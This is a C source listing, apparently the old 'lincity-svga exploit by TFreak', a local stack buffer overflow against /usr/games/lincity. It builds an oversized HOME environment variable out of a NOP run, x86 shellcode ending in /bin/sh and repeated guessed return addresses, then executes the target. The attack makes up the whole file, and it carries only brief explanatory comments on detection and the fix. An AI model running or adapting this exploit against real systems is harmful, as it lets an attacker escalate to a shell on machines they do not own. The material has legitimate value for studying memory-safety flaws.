- /*
- * lincity-svga exploit by TFreak
- *
- * another example of bad programming, copying the HOME
- * environment without bounds checking to a static size buffer
- * (100 bytes)
- *
- */
-
- #include <stdio.h>
-
- #define bs 250 /* size in bytes of the buffer built for HOME; the header comment gives the target's buffer as 100 bytes */
- #define of 300 /* fixed offset subtracted from this process's stack pointer to form the address guess */
- /* sp() is defined after main; it reports the current stack pointer. */
- unsigned long sp (void);
-
- int main(int argc, char *argv[])
- { /* Proof of concept for the unbounded HOME copy described in the header comment: builds an oversized HOME value, then executes /usr/games/lincity with it in the environment. */
- char *p, *buf;
- char shell[] = /* opaque machine-code bytes ending in the literal "/bin/sh"; not decoded here */
- "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
- "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
- "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
- unsigned long addr, *paddr;
- int i;
- /* Heap buffer of bs bytes that becomes the HOME value; the malloc result is not checked. */
- buf = (char *) malloc(bs);
- p = buf;
- paddr = (unsigned long *) p;
- /* Address guess: this process's own stack pointer minus a fixed offset. That presumes the target's stack sits at about the same address, an assumption stack-address randomisation invalidates. */
- addr = sp() - of;
- /* Fill the buffer with repeated copies of that address. */
- for (i = 0; i < bs; i += 4)
- *(paddr++) = addr;
- /* Overwrite the first half of the buffer with 0x90 bytes (the one-byte x86 NOP). */
- memset(p, 0x90, bs/2);
- p += bs/2;
- /* Copy the payload bytes in directly after the 0x90 run. */
- for (i = 0; i < strlen(shell); i++)
- *(p++) = shell[i];
- /* The result reaches the target through HOME. For detection, the visible artifact is a HOME value far longer than any real path and made of non-printable bytes. Per the header comment, the fix belongs in the target: bound its copy of HOME to the destination size. */
- setenv("HOME", buf, 1);
- execl("/usr/games/lincity", "lincity", NULL);
- }
-
- unsigned long sp (void) /* Reports the current stack pointer to the caller (32-bit x86 registers, GCC-style inline asm). */
- {
- __asm__("movl %esp, %eax"); /* copies %esp into %eax; there is no return statement, so the result is whatever this leaves in %eax, which is compiler-dependent and not guaranteed by C */
- }
-